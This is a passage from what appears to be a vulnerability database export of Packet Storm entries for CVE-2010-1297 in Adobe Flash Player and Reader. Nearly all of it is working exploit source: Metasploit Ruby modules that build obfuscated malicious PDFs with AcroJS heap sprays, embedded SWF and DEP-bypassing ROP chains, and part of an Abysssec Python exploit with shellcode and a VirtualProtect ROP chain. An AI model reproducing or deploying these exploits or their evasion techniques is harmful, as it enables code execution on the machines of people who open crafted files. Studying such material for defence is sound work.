ioRef(3) \npdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# swf annotation object \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\") \npdf << nObfu(\"/Rect [20 20 187 69] \") \npdf << nObfu(\"/RichMediaSettings \") << ioRef(8) \npdf << nObfu(\"/RichMediaContent \") << ioRef(9) \npdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media settings \nxref << pdf.length \npdf << ioDef(8) \npdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\") \npdf << nObfu(\"/Activation \") << ioRef(10) \npdf << nObfu(\"/Deactivation \") << ioRef(11) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media content \nxref << pdf.length \npdf << ioDef(9) \npdf << nObfu(\"<</Type/RichMediaContent\") \npdf << nObfu(\"/Assets \") << ioRef(12) \npdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\" \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media activation / deactivation \nxref << pdf.length \npdf << ioDef(10) \npdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\") \npdf << eol << endobj \n \nxref << pdf.length \npdf << ioDef(11) \npdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\") \npdf << eol << endobj \n \n# rich media assets \nxref << pdf.length \npdf << ioDef(12) \npdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# swf embeded file ref \nxref << pdf.length \npdf << ioDef(13) \npdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\") \npdf << eol << endobj \n \n# rich media configuration \nxref << pdf.length \npdf << ioDef(14) \npdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\") \npdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# rich media isntance \nxref << pdf.length \npdf << ioDef(15) \npdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\") \npdf << nObfu(\"/Asset \") << ioRef(13) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# swf stream \n# NOTE: This data is already compressed, no need to compress it again... \nxref << pdf.length \npdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol \npdf << \"stream\" << eol \npdf << swf << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/90665/windows-browser-adobe_flashplayer_newfunction.rb.txt"}, {"lastseen": "2016-12-05T22:15:06", "description": "", "published": "2010-06-15T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player newfucntion Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-15T00:00:00", "id": "PACKETSTORM:90664", "href": "https://packetstormsecurity.com/files/90664/Adobe-Flash-Player-newfucntion-Invalid-Pointer-Use.html", "sourceData": "`## \n# $Id: adobe_flashplayer_newfunction.rb 9477 2010-06-10 20:55:17Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use', \n'Description' => %q{ \nThis module exploits a vulnerability in the DoABC tag handling within \nversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also \nvulnerable, as are any other applications that may embed Flash player. \n \nArbitrary code executiong is achieved by embedding a specially crafted Flash \nmovie into a PDF document. An AcroJS heap spray is used in order to ensure \nthat the memory used by the invalid pointer issue is controlled. \n \nNOTE: This module uses a similar DEP bypass method to that used within the \nadobe_libtiff module. This method is unlikely to work across various \nWindows versions due a the hardcoded syscall number. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Found being openly exploited \n'jduck' # Metasploit version \n], \n'Version' => '$Revision: 9477 $', \n'References' => \n[ \n['CVE', '2010-1297'], \n['OSVDB', '65141'], \n['BID', '40586'], \n['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'], \n# For SWF->PDF embedding \n['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd \n# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd \n# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd \n[ 'Automatic', { }], \n], \n'DisclosureDate' => 'Jun 04 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \nend \n \ndef exploit \nswf_data = make_swf() \njs_data = make_js(payload.encoded) \n \n# Create the pdf \npdf = make_pdf(swf_data, js_data) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \ndef make_swf \n# load the static swf file \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-1297.swf\" ) \nfd = File.open( path, \"rb\" ) \nswf_data = fd.read(fd.stat.size) \nfd.close \nswf_data \nend \n \ndef make_js(encoded_payload) \n \n# The following executes a ret2lib using BIB.dll \n# The effect is to bypass DEP and execute the shellcode in an indirect way \nstack_data = [ \n0xc0c0c0c, \n0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret \n0xcccccccc, \n0x70048ef, # xchg eax,esp / ret \n0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] \n0xcccccccc, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009033, # ret 0x18 \n0x7009084, # ret \n0xc0c0c0c, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7001599, # pop ebp / ret \n0x10124, \n0x70072f7, # pop eax / ret \n0x10104, \n0x70015bb, # pop ecx / ret \n0x1000, \n0x700154d, # mov [eax], ecx / ret \n0x70015bb, # pop ecx / ret \n0x7ffe0300, # -- location of KiFastSystemCall \n0x7007fb2, # mov eax, [ecx] / ret \n0x70015bb, # pop ecx / ret \n0x10011, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70015bb, # pop ecx / ret \n0x10100, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70072f7, # pop eax / ret \n0x10011, \n0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) \n0x7005c54, # pop esi / add esp,0x14 / ret \n0xffffffff, \n0x10100, \n0x0, \n0x10104, \n0x1000, \n0x40, \n# The next bit effectively copies data from the interleaved stack to the memory \n# pointed to by eax \n# The data copied is: \n# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83 \n# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff \n# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90 \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x70015bb, # pop ecx / ret \n0x9054905a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5815eb5a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x18891a8b, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x8304c083, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xfb8104c2, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xc0c0c0c, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5ebee75, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xffffe6e8, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x909090ff, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90ffffff, \n0x700154d, # mov [eax], ecx / ret \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x700112f # call eax -- (execute stub to transition to full shellcode) \n].pack('V*') \n \nvar_unescape = rand_text_alpha(rand(100) + 1) \nvar_shellcode = rand_text_alpha(rand(100) + 1) \n \nvar_start = rand_text_alpha(rand(100) + 1) \n \nvar_s = 0x10000 \nvar_c = rand_text_alpha(rand(100) + 1) \nvar_b = rand_text_alpha(rand(100) + 1) \nvar_d = rand_text_alpha(rand(100) + 1) \nvar_3 = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(100) + 1) \nvar_4 = rand_text_alpha(rand(100) + 1) \n \npayload_buf = '' \npayload_buf << stack_data \npayload_buf << encoded_payload \n \nescaped_payload = Rex::Text.to_unescape(payload_buf) \n \njs = %Q| \nvar #{var_unescape} = unescape; \nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); \nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" ); \nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; \n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); \n#{var_b} += #{var_shellcode}; \n#{var_b} += #{var_c}; \n#{var_d} = #{var_b}.substring(0, #{var_s}/2); \nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; \n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); \nvar #{var_4} = new Array(); \nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\"; \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(swf, js) \n \nswf_name = rand_text_alpha(8 + rand(8)) + \".swf\" \n \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \n#pdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog\") \npdf << nObfu(\"/Pages \") << ioRef(3) \npdf << nObfu(\"/OpenAction \") << ioRef(5) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) \npdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# swf annotation object \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\") \npdf << nObfu(\"/Rect [20 20 187 69] \") \npdf << nObfu(\"/RichMediaSettings \") << ioRef(8) \npdf << nObfu(\"/RichMediaContent \") << ioRef(9) \npdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media settings \nxref << pdf.length \npdf << ioDef(8) \npdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\") \npdf << nObfu(\"/Activation \") << ioRef(10) \npdf << nObfu(\"/Deactivation \") << ioRef(11) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media content \nxref << pdf.length \npdf << ioDef(9) \npdf << nObfu(\"<</Type/RichMediaContent\") \npdf << nObfu(\"/Assets \") << ioRef(12) \npdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\" \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media activation / deactivation \nxref << pdf.length \npdf << ioDef(10) \npdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\") \npdf << eol << endobj \n \nxref << pdf.length \npdf << ioDef(11) \npdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\") \npdf << eol << endobj \n \n# rich media assets \nxref << pdf.length \npdf << ioDef(12) \npdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# swf embeded file ref \nxref << pdf.length \npdf << ioDef(13) \npdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\") \npdf << eol << endobj \n \n# rich media configuration \nxref << pdf.length \npdf << ioDef(14) \npdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\") \npdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# rich media isntance \nxref << pdf.length \npdf << ioDef(15) \npdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\") \npdf << nObfu(\"/Asset \") << ioRef(13) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# swf stream \n# NOTE: This data is already compressed, no need to compress it again... \nxref << pdf.length \npdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol \npdf << \"stream\" << eol \npdf << swf << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/90664/windows-fileformat-adobe_flashplayer_newfunction.rb.txt"}, {"lastseen": "2016-12-05T22:19:29", "description": "", "published": "2010-09-01T00:00:00", "type": "packetstorm", "title": "Month Of Abysssec Undisclosed Bugs - Adobe Reader / Flash Invalid Pointer", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-09-01T00:00:00", "id": "PACKETSTORM:93394", "href": "https://packetstormsecurity.com/files/93394/Month-Of-Abysssec-Undisclosed-Bugs-Adobe-Reader-Flash-Invalid-Pointer.html", "sourceData": "`''' \n__ __ ____ _ _ ____ \n| \\/ |/ __ \\ /\\ | | | | _ \\ \n| \\ / | | | | / \\ | | | | |_) | \n| |\\/| | | | |/ /\\ \\| | | | _ < Day 1 (Binary Analysis) \n| | | | |__| / ____ \\ |__| | |_) | \n|_| |_|\\____/_/ \\_\\____/|____/ \n \nhttp://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/ \nhttp://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz \n \nTitle : Adobe Acrobat Reader and Flash Player \u201cnewclass\u201d invalid pointer vulnerability \nAnalysis : http://www.abysssec.com \nVendor : http://www.adobe.com \nImpact : Ciritical \nContact : shahin [at] abysssec.com , info [at] abysssec.com \nTwitter : @abysssec \nCVE : CVE-2010-1297 \nMOAUB Number : MOAUB-01-BA \n''' \n \nimport sys \n \nclass PDF: \n \ndef __init__(self): \nself.xrefs = [] \nself.eol = '\\x0a' \nself.content = '' \nself.xrefs_offset = 0 \n \ndef header(self): \nself.content += '%PDF-1.6' + self.eol \n \ndef obj(self, obj_num, data,flag): \nself.xrefs.append(len(self.content)) \nself.content += '%d 0 obj' % obj_num \nif flag == 1: \nself.content += self.eol + '<< ' + data + ' >>' + self.eol \nelse: \nself.content += self.eol + data + self.eol \nself.content += 'endobj' + self.eol \n \ndef obj_SWFStream(self, obj_num, data, stream): \nself.xrefs.append(len(self.content)) \nself.content += '%d 0 obj' % obj_num \nself.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream)) \nself.content += ' >>' + self.eol \nself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol \nself.content += 'endobj' + self.eol \n \ndef obj_Stream(self, obj_num, data, stream): \nself.xrefs.append(len(self.content)) \nself.content += '%d 0 obj' % obj_num \nself.content += self.eol + '<< ' + data + '/Length %d' %len(stream) \nself.content += ' >>' + self.eol \nself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol \nself.content += 'endobj' + self.eol \n \ndef ref(self, ref_num): \nreturn '%d 0 R' % ref_num \n \ndef xref(self): \nself.xrefs_offset = len(self.content) \nself.content += 'xref' + self.eol \nself.content += '0 %d' % (len(self.xrefs) + 1) \nself.content += self.eol \nself.content += '0000000000 65535 f' + self.eol \nfor i in self.xrefs: \nself.content += '%010d 00000 n' % i \nself.content += self.eol \n \ndef trailer(self): \nself.content += 'trailer' + self.eol \nself.content += '<< /Size %d' % (len(self.xrefs) + 1) \nself.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol \nself.content += 'startxref' + self.eol \nself.content += '%d' % self.xrefs_offset \nself.content += self.eol \nself.content += '%%EOF' \n \ndef generate(self): \nreturn self.content \n \n \n \n \nclass Exploit: \n \ndef convert_to_utf16(self, payload): \nenc_payload = '' \nfor i in range(0, len(payload), 2): \nnum = 0 \nfor j in range(0, 2): \nnum += (ord(payload[i + j]) & 0xff) << (j * 8) \nenc_payload += '%%u%04x' % num \nreturn enc_payload \n \ndef get_payload(self): \n# shellcode calc.exe \npayload =(\"\\x90\\x90\\x90\\x89\\xE5\\xD9\\xEE\\xD9\\x75\\xF4\\x5E\\x56\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" \n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5A\\x6A\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6B\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\" \n\"\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4A\\x49\\x4B\\x4C\\x4B\\x58\\x51\\x54\\x43\\x30\\x43\\x30\\x45\\x50\\x4C\\x4B\\x51\\x55\\x47\\x4C\\x4C\\x4B\\x43\\x4C\" \n\"\\x43\\x35\\x44\\x38\\x45\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x44\\x58\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x45\\x51\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C\" \n\"\\x4B\\x43\\x31\\x4A\\x4E\\x46\\x51\\x49\\x50\\x4A\\x39\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x42\\x54\\x45\\x57\\x49\\x51\\x48\\x4A\\x44\\x4D\\x45\\x51\\x49\\x52\" \n\"\\x4A\\x4B\\x4B\\x44\\x47\\x4B\\x46\\x34\\x46\\x44\\x45\\x54\\x43\\x45\\x4A\\x45\\x4C\\x4B\\x51\\x4F\\x47\\x54\\x43\\x31\\x4A\\x4B\\x43\\x56\\x4C\\x4B\\x44\" \n\"\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C\\x4C\\x4B\\x43\\x31\\x4A\\x4B\\x4C\\x49\\x51\\x4C\\x47\\x54\\x45\\x54\" \n\"\\x48\\x43\\x51\\x4F\\x46\\x51\\x4C\\x36\\x43\\x50\\x46\\x36\\x45\\x34\\x4C\\x4B\\x50\\x46\\x50\\x30\\x4C\\x4B\\x47\\x30\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45\" \n\"\\x4C\\x4E\\x4D\\x4C\\x4B\\x42\\x48\\x44\\x48\\x4D\\x59\\x4B\\x48\\x4B\\x33\\x49\\x50\\x43\\x5A\\x46\\x30\\x45\\x38\\x4C\\x30\\x4C\\x4A\\x45\\x54\\x51\\x4F\" \n\"\\x42\\x48\\x4D\\x48\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x50\\x57\\x4B\\x4F\\x4A\\x47\\x43\\x53\\x47\\x4A\\x51\\x4C\\x50\\x57\\x51\\x59\\x50\\x4E\\x50\\x44\\x50\" \n\"\\x4F\\x46\\x37\\x50\\x53\\x51\\x4C\\x43\\x43\\x42\\x59\\x44\\x33\\x43\\x44\\x43\\x55\\x42\\x4D\\x50\\x33\\x50\\x32\\x51\\x4C\\x42\\x43\\x45\\x31\\x42\\x4C\" \n\"\\x42\\x43\\x46\\x4E\\x45\\x35\\x44\\x38\\x42\\x45\\x43\\x30\\x41\\x41\") \nreturn payload \n \n \ndef getSWF(self): \ntry: \n#swfFile = sys.argv[2] \nfdR = open('flash.swf', 'rb+') \nstrTotal = fdR.read() \nstr1 = strTotal[:88] \naddr1 = '\\x06\\xa6\\x17\\x30' # addr = 0c0c0c0c \nstr2 = strTotal[92:533] \n#*************************** Bypass DEP by VirtualProtect ******************************** \nrop = '' \nrop += \"\\x77\\xFA\\x44\\x7E\" # mov edi,esp ret 4 \nrop += \"\\x94\\x28\\xc2\\x77\" #add esp,20 pop ebp ret \nrop += \"AAAA\" #padding \nrop += \"\\xD4\\x1A\\x80\\x7C\" # VirtualProtect \nrop += \"BBBB\" # Ret Addr for VirtualProtect \nrop += \"CCCC\" # Param1 (lpAddress) \nrop += \"DDDD\" # Param2 (Size) \nrop += \"EEEE\" # Param3 (flNewProtect) \nrop += \"\\x10\\xB0\\xEF\\x77\" # Param4 (Writable Address) \nrop += \"AAAAAAAAAAAA\" #padding \nrop += \"\\xC2\\x4D\\xC3\\x77\" #mov eax,edi pop esi ret \nrop += \"AAAA\" #padding \nrop += \"\\xF2\\xE1\\x12\\x06\" #add eax,94 ret \nrop += \"\\x70\\xDC\\xEE\\x77\" #push esp pop ebp ret4 \nrop += \"\\x16\\x9A\\x94\\x7C\" #mov [ebp-30],eax ret \nrop += \"AAAA\" #padding \nrop += \"\\xC2\\x4D\\xC3\\x77\" #mov eax,edi pop esi ret \nrop += \"AAAA\" #padding \nrop += \"\\xF2\\xE1\\x12\\x06\" #add eax,94 ret \nrop += \"\\x79\\x9E\\x83\\x7C\" #mov [ebp-2c],eax ret \nrop += \"\\x27\\x56\\xEA\\x77\" #mov eax,6b3 ret \nrop += \"\\x14\\x83\\xE0\\x77\" #mov [ebp-28],eax ret \nrop += \"\\xB4\\x01\\xF2\\x77\" #xor eax,eax ret \nrop += \"\\x88\\x41\\x97\\x7C\" #add eax,40 pop ebp ret \nrop += \"AAAA\" #padding \nrop += \"\\x70\\xDC\\xEE\\x77\" #push esp pop ebp ret4 \nrop += \"\\xC0\\x9E\\xEF\\x77\" #mov [ebp-54],eax ret \nrop += \"AAAA\" #padding \nrop += \"\\xC2\\x4D\\xC3\\x77\" #mov eax,edi pop esi ret \nrop += \"AAAA\" #padding \nrop += \"\\xC1\\xF2\\xC1\\x77\" #add eax,8 ret \nrop += \"\\xCF\\x97\\xDE\\x77\" #xchg eax,esp ret \n \nstr3 = strTotal[669:1249] \nalignESP = \"\\x83\\xc4\\x03\" \nsc = self.get_payload() \n \nif len(sc) > 2118: \nprint \"[*] Error : payload length is long\" \nreturn \nif len(sc) <= 2118: \ndif = 2118 - len(sc) \nwhile dif > 0 : \nsc += '\\x90' \ndif = dif - 1 \n \nstr4 = strTotal[3370:3726] \n \naddr2 = '\\xF2\\x3D\\x8D\\x23' # Enter 0C75 , 81 RET \n \nstr5 = strTotal[3730:] \n \nfdW= open('exploit.swf', 'wb+') \nfinalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5 \nfdW.write(finalStr) \n \n#strTotal = open('exploit.swf', 'rb+').read() \nfdW.close() \nfdR.close() \nreturn finalStr \n \nexcept IOError: \nprint '[*] Error : An IO error has occurred' \n \ndef HeapSpray(self): \nspray = ''' \nfunction spray_heap() \n{ \nvar chunk_size, payload, nopsled; \n \nchunk_size = 0x1A0000; \npointers = unescape(\"%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030\"); \npointerSled = unescape(\"<Contents>\"); \nwhile (pointerSled.length < chunk_size) \npointerSled += pointerSled; \npointerSled_len = chunk_size - 